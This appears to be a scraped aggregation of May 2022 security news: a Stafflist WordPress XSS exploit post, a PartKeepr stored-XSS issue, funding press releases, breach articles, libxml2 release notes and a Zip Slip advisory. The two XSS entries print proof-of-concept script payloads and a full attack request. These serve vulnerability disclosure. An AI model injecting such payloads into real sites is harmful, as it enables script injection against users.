WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

WordPress Stafflist 3.1.2 Cross Site Scripting

Tiger Global Management invests $35 million in SkyHawk Security to accelerate growth.

**TEL AVIV, Israel, May 3, 2022—** Radware® (NASDAQ: RDWR), a leading provider of cyber security and application delivery solutions, today announced the spinoff of its Cloud Native Protector (CNP) business to form a new company called SkyHawk Security. To accelerate

SkyHawk Security’s development and growth opportunities, an affiliate of Tiger Global

Management will make a $35 million strategic external investment, resulting in a valuation of $180 million. Tiger Global Management is a leading global technology investment firm focused on private and public companies in the internet, software, and financial technology sectors.

Skyhawk Security is a leader in cloud threat detection and protects dozens of the world’s leading organizations using its artificial intelligence and machine learning technologies. Its Cloud Native Protector provides comprehensive protection for workloads and applications hosted in public cloud environments. It uses a multi-layered approach that covers the overall security posture of the cloud and threats to individual workloads. Easy-to-deploy, the agentless solution identifies and prevents compliance violations, cloud security misconfigurations, excessive permissions, and malicious activity in the cloud.

“We recognize the growing opportunities in the public cloud security market and are planning to capitalize on them,” said Roy Zisapel, Radware’s president and CEO. “We look forward to partnering with Tiger Global Management to scale the business, unlock even more security value for customers, and position SkyHawk Security for long-term success.”

The spinoff, which adds to Radware’s recently announced strategic cloud services initiative, further demonstrates the company’s ongoing commitment to innovation. SkyHawk Security will have the ability to operate with even greater sales, marketing, and product focus as well as speed and flexibility. Current and new CNP customers will benefit from future product development efforts, while CNP services for existing customers will continue without interruption.

Radware does not expect the deal to materially affect operating results for the second quarter or full year of 2022.

**About Tiger Global Management**

Tiger Global Management is a leading global technology investment firm that focuses on private and public companies in the software, internet, and financial technology sectors. Since 2001, Tiger Global has invested in hundreds of companies across more than 30 countries, including investments ranging from Series A to pre-IPO. The firm aims to partner with dynamic entrepreneurs operating market-leading companies in its core focus areas.

**About Radware**

Radware® (NASDAQ: RDWR) is a global leader of cyber security and application delivery solutions for physical, cloud, and software defined data centers. Its award-winning solutions portfolio secures the digital experience by providing infrastructure, application, and corporate IT protection, and availability services to enterprises globally. Radware’s solutions empower enterprise and carrier customers worldwide to adapt to market challenges quickly, maintain business continuity, and achieve maximum productivity while keeping costs down. For more information, please visit the Radware website.

Radware encourages you to join our community and follow us on: Facebook, LinkedIn, Radware Blog, Twitter, YouTube, and Radware Mobile for iOS and Android.

©2022 Radware Ltd. All rights reserved. Any Radware products and solutions mentioned in this press release are protected by trademarks, patents, and pending patent applications of Radware in the U.S. and other countries. For more details, please

see: https://www.radware.com/LegalNotice/. All other trademarks and names are property of their respective owners.

Radware believes the information in this document is accurate in all material respects as of its publication date. However, the information is provided without any express, statutory, or implied warranties and is subject to change without notice.

The contents of any website or hyperlinks mentioned in this press release are for informational purposes and the contents thereof are not part of this press release.

Radware Launches SkyHawk Security, a Spinoff of Its  Cloud Native Protector Business

Funding follows dramatic revenue growth as identity-based access requirements skyrocket.

**OAKLAND, Calif., May 3, 2022** – Teleport, the leading provider of Identity-based Infrastructure Access Management, today announced it has raised $110 million in Series C funding led by Bessemer Venture Partners with participation from Insight Partners and existing investors Kleiner Perkins and S28 Capital. This investment brings Teleport’s total funding raised to $169 million at a current valuation of $1.1 billion, and comes after the company nearly tripled its revenue and doubled its customer base from 2020 to 2021.

As a part of the investment, Bessemer Venture Partners’ Mary D’Onofrio will take a seat on Teleport’s board, and Insight Partners’ Matt Koran will be a board observer. In August 2021, Teleport announced its $30 million Series B round led by S28 Capital and Kleiner Perkins.

“Growing complexity of modern cloud environments has led to a situation where managing secure access to infrastructure begins to break, as evidenced by increased frequency and severity of breaches.,” said Ev Kontsevoy, co-founder and CEO, Teleport. “Our customers are forward thinking organizations that are scaling quickly. They realized that the right way to scale access is consolidation across all protocols and environments. Our platform, the open-source Teleport Access Plane, addresses these challenges by giving every engineer, every piece of hardware and every application an identity. With identity based access for everyone and everything, more security threats are neutralized and the impact of breaches is dramatically reduced without impacting developer productivity.”

As organizations deal with complexity because of shifts to the cloud, modernization of IT stack and growth of mixed infrastructure environments, Teleport’s open-source Access Plane technology consolidates the four essential capabilities every security-conscious organization needs: connectivity, authentication, authorization and audit. By providing the only cloud-native, identity-based infrastructure access solution for humans and machines, Teleport eliminates network perimeter security issues, reduces attack surface area, cuts operational overhead, enforces security & compliance, and improves developer productivity, all at once.

With this latest funding, Teleport will expand its go-to-market organization to serve its fast-growing, global customer base. Teleport will also bolster its R&D organization to solve the most complex security challenges faced by organizations of all sizes.

“Now, more than ever, is the time to make it easy for any company to employ world class security practices as global cyber attacks become more and more sophisticated,” said Mary D’Onofrio, partner and co-founder of growth investment practice, Bessemer Venture Partners. “With Teleport, security becomes stronger \*and\* simpler for both humans and machines, making it possible to deploy and enforce security and compliance best-practices throughout all organizations. We’re excited to lead this round and I am looking forward to working closely with Ev and his team to offer elegant cybersecurity solutions to a growing customer base of household names.”

Customers including Doordash, Elastic, Nasdaq, Snowflake and others use Teleport to secure digital infrastructure access for remote and hybrid workforces and combat the ever-increasing cyber threats.

"Speed is key to our business. But so is security,” said Luke Christopherson, Software Engineer at Doordash. “The Teleport Access Plane allows our engineers to securely access the infrastructure they need to do their jobs without getting in the way of productivity. Everybody wins."

Teleport recently announced Teleport 9, the latest edition of the open-source Teleport Access Plane. This release introduced Teleport Machine ID which delivers identity-based access and audit capabilities for resources including servers and databases, CI/CD automation, service accounts and custom code in applications such as microservices. Teleport 9 also included Teleport Connect, a secure, developer-friendly browser for cloud infrastructure. The browser solves the issues posed by terminals optimized for local environments when a majority of development now happens in the cloud.

Steven Dickens, Senior Analyst, Futurum Research commented, "As digital transformation takes hold from the core to the edge, security becomes more critical. The team at Teleport are focused on delivering cloud-native, identity-based infrastructure access solutions for both humans and machines. The announcement today take the company one step closer to its mission of eliminating the need for secrets when accessing infrastructure, and as a result delivering both simpler, stronger identity-based authentication.”

To learn more about Teleport and today’s news, visit the company’s website or most recent blog about the funding.

**About Teleport**

Teleport, leading provider of Identity-based Infrastructure Access Management, consolidates the four essential infrastructure access capabilities every security-conscious organization needs: connectivity, authentication, authorization, and audit. Teleport’s unique approach is not only more secure but also improves developer productivity. Teleport is used by leading companies including Elastic, Snowflake, Doordash, and NASDAQ. The company is backed by Bessemer Venture Partners, Insight Partners, Kleiner Perkins, and S28 Capital. Headquartered in Oakland, California, the company embraces a remote-first work culture.

**About Bessemer Venture Partners**

Bessemer Venture Partners helps entrepreneurs lay strong foundations to build and forge long-standing companies. With more than 135 IPOs and 200 portfolio companies in the enterprise, consumer and healthcare spaces, Bessemer supports founders and CEOs from their early days through every stage of growth. Bessemer’s global portfolio includes Pinterest, Shopify, Twilio, Yelp, LinkedIn, PagerDuty, DocuSign, Wix, Fiverr and Toast and has $9 billion of capital under management. Bessemer has teams of investors and partners located in Tel Aviv, Silicon Valley, San Francisco, New York, London, Boston, Beijing and Bangalore. Born from innovations in steel more than a century ago, Bessemer’s storied history has afforded its partners the opportunity to celebrate and scrutinize its best investment decisions (see Memos) and also learn from its mistakes (see Anti-Portfolio).

Teleport Raises $110 Million Series C at $1.1 Billion Valuation Led by Bessemer Venture Partners

An issue was discovered in Logitech Options. The OAuth 2.0 state parameter was not properly validated. This leaves applications vulnerable to CSRF attacks during authentication and authorization operations.

*   Register
*   Getting Started
*   FAQ
*   Community
*   Downloads
*   Warranty
*   Specifications
*   Spare Parts
*   Gallery
*   Contact Us

**There are no Downloads for this Product**

**There are no FAQs for this Product**

**There are no Spare Parts available for this Product**

Logitech Options

More

Check our Logitech Warranty here

**Make the Most of your warranty**

Register Your Product FIle a Warranty Claim

**Frequently Asked Questions**

*   Windows
    
    {\[{versionList\[key\]}\]}
    
    Mac
    
    {\[{versionList\[key\]}\]}
    
    Other
    
    {\[{versionList\[key\]}\]}
    

**There are no Downloads for this Version.**

Show All Downloads

**Compatible Product**

**Product Specific Phone Numbers**

**Main Phone Numbers**

CVE-2022-0916: Logitech Options

Adaptive Health Integrations (AHI) has been breached. Sensitive information was accessed, but it took months to make the incident public.
The post US healthcare billing services group hacked, affecting at least half a million individuals appeared first on Malwarebytes Labs.

According to the US Department of Health and Human Services, Adaptive Health Integrations (AHI), a healthcare software and billing services firm in North Dakota, suffered a data breach that affected more than half a million individuals. According to the firm, the breach occurred in mid-October last year, but it only started notifying people last month.

The notification letter, a copy of which was posted on the Montana Attorney General’s website, states that the firm was made aware of the attack recently and immediately took action.

> “Upon learning of the issue, we contained the threat by disabling unauthorized access to our network and commenced a prompt and thorough investigation with assistance from external cybersecurity professionals. Through an extensive investigation and an internal review, which concluded on February 23, 2022, we determined that certain potentially accessed data contained personal information such as names, dates of birth, contact information, and Social Security numbers.”

The firm was quick to add that not all individuals were affected by the breach, and not all information about affected individuals was accessed.

The letter advises those affected on what they should do next. In it, individuals are encouraged to enrol in free, 12-month complimentary identity monitor services provided by a third party. Doing so opens up additional services to help clients, such as fraud consultation and identity theft restoration.

HIPAA Journal noted that the letter has no information about Adaptive Health Integrations or why it keeps people’s protected health information (PHI). Recipients of the letter also questioned its legitimacy because it used paper with a photocopied company logo, making it look dubious and unprofessional. After checking the website (screenshot below), some letter recipients thought it was a scam.

A couple of law firms, namely Murphy Law Firm in Oklahoma and Migliaccio & Rathod LLP in Washington, are conducting their own investigation on behalf of individuals affected by the breach. Both firms made their announcements days apart.

US healthcare billing services group hacked, affecting at least half a million individuals

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter.

**Description**

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

**Reproduction Steps**

Browsing to Edit tab, select project and add new project.  
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

    POST /api/projects HTTP/1.1
    Host: partkeepr.vuln
    Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Authorization: Basic YWRtaW46YWRtaW4=
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 303
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    Te: trailers
    Connection: close
    
    {"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}
    

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from **projects** , the following tabs are also vulnerable : **footprints**,**manufacturers**,**storage locations**, **distributors**, **part measurement units** , **units** and **batch jobs**

**System Information**

*   PartKeepr Version: 1.4.0
*   Operating System: LInux
*   Web Server: Apache
*   PHP Version: 7.4
*   Database and version: Mysql
*   Reproducible on the demo system: Yes

CVE-2021-39390: Stored XSS in PartKeepr · Issue #1237 · partkeepr/PartKeepr

The US, EU member states, and other non-EU countries commit to this new internet declaration and encourage others to join.
The post Over 50 countries sign the “Declaration for the Future of the Internet” appeared first on Malwarebytes Labs.

Governments of the US, EU member states, and 32 other countries have announced the launch of the “Declaration for the Future of the Internet,” a “political commitment” among endorsers “to advance a positive vision for the internet and digital technologies.”

“We are united by a belief in the potential of digital technologies to promote connectivity, democracy, peace, the rule of law, sustainable development, and the enjoyment of human rights and fundamental freedoms,” the declaration began. “As we increasingly work, communicate, connect, engage, learn, and enjoy leisure time using digital technologies, our reliance on an open, free, global, interoperable, reliable, and secure Internet will continue to grow. Yet we are also aware of the risks inherent in that reliance and the challenges we face.”

The White House and the European Commission summarized the three-page proposition and invited other countries to sign. To date, the countries that endorse the declaration are Albania, Andorra, Argentina, Australia, Austria, Belgium, Bulgaria, Cabo Verde, Canada, Colombia, Costa Rica, Croatia, Cyprus, Czech Republic, Denmark, Dominican Republic, Estonia, the European Commission, Finland, France, Georgia, Germany, Greece, Hungary, Iceland, Ireland, Israel, Italy, Jamaica, Japan, Kenya, Kosovo, Latvia, Lithuania, Luxembourg, Maldives, Malta, Marshall Islands, Micronesia, Moldova, Montenegro, Netherlands, New Zealand, Niger, North Macedonia, Palau, Peru, Poland, Portugal, Romania, Senegal, Serbia, Slovakia, Slovenia, Spain, Sweden, Taiwan, Trinidad and Tobago, the United Kingdom, Ukraine, and Uruguay.

The declaration is a “political commitment” among endorsers to “advance a positive vision for the Internet and digital technologies.” It is a reaffirmation for endorsers that they’re committed to respecting and preserving human rights online across digital ecosystems and committing to “a single global internet” that fosters the following principles:

*   Protect human rights and fundamental freedoms of all people; 
*   Promote a global Internet that advances the free flow of information; 
*   Advance inclusive and affordable connectivity so that all people can benefit from the digital economy; 
*   Promote trust in the global digital ecosystem, including through protection of privacy; and 
*   Protect and strengthen the multi-stakeholder approach to governance that keeps the Internet running for the benefit of all.

A single, global internet rejects the idea of restricted internet access—a “splinternet”—that regimes like Russia, China, and North Korea (all of whom did not sign the declaration) have implemented in their own countries. Splinternets are heavily regulated, and governments can pick and choose what they want their citizens to see and not see.

While every country is working towards the common goal of building a better internet and online experience for everyone, now and in the future, the Declaration allows member countries to be autonomous in creating their own laws and policies to uphold the above principles.

“We believe that the principles for the future of the Internet are universal in nature and as  
such we invite those who share this vision to affirm these principles and join us in the implementation of this vision,” the declaration concludes.

Over 50 countries sign the “Declaration for the Future of the Internet”

In libxml2 before 2.9.14, several buffer handling functions in buf.c (xmlBuf*) and tree.c (xmlBuffer*) don't check for integer overflows. This can result in out-of-bounds memory writes. Exploitation requires a victim to open a crafted, multi-gigabyte XML file. Other software using libxml2's buffer functions, for example libxslt through 1.1.35, is affected as well.

**Download source code**

Release v2.9.14

**Security**

*   **\[CVE-2022-29824\]** Integer overflow in xmlBuf and xmlBuffer
*   Fix potential double-free in xmlXPtrStringRangeFunction
*   Fix memory leak in xmlFindCharEncodingHandler
*   Normalize XPath strings in-place
*   Prevent integer-overflow in htmlSkipBlankChars() and xmlSkipBlankChars() (David Kilzer)
*   Fix leak of xmlElementContent (David Kilzer)

**Bug fixes**

*   Fix parsing of subtracted regex character classes
*   Fix recursion check in xinclude.c
*   Reset last error in xmlCleanupGlobals
*   Fix certain combinations of regex range quantifiers
*   Fix range quantifier on subregex

**Improvements**

*   Fix recovery from invalid HTML start tags

**Build system, portability**

*   Define LFS macros before including system headers
*   Initialize XPath floating-point globals
*   configure: check for icu DEFS (James Hilliard)
*   configure.ac: produce tar.xz only (GNOME policy) (David Seifert)
*   CMakeLists.txt: Fix LIBXML\_VERSION\_NUMBER
*   Fix build with older Python versions
*   Fix --without-valid build

CVE-2022-29824: v2.9.14 · Tags · GNOME / libxml2

**Security**

*   **\[CVE-2022-29824\]** Integer overflow in xmlBuf and xmlBuffer
*   Fix potential double-free in xmlXPtrStringRangeFunction
*   Fix memory leak in xmlFindCharEncodingHandler
*   Normalize XPath strings in-place
*   Prevent integer-overflow in htmlSkipBlankChars() and xmlSkipBlankChars() (David Kilzer)
*   Fix leak of xmlElementContent (David Kilzer)

**Bug fixes**

*   Fix parsing of subtracted regex character classes
*   Fix recursion check in xinclude.c
*   Reset last error in xmlCleanupGlobals
*   Fix certain combinations of regex range quantifiers
*   Fix range quantifier on subregex

**Improvements**

*   Fix recovery from invalid HTML start tags

**Build system, portability**

*   Define LFS macros before including system headers
*   Initialize XPath floating-point globals
*   configure: check for icu DEFS (James Hilliard)
*   configure.ac: produce tar.xz only (GNOME policy) (David Seifert)
*   CMakeLists.txt: Fix LIBXML\_VERSION\_NUMBER
*   Fix build with older Python versions
*   Fix --without-valid build

All versions of package `com.alibaba.oneagent:one-java-agent-plugin` are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) using a specially crafted archive that holds directory traversal filenames (e.g. `../../evil.exe`). The attacker can overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine.

**Path Traversal in com.alibaba.oneagent:one-java-agent-plugin**

Moderate severity GitHub Reviewed Published May 3, 2022 • Updated May 20, 2022

Tag

#mac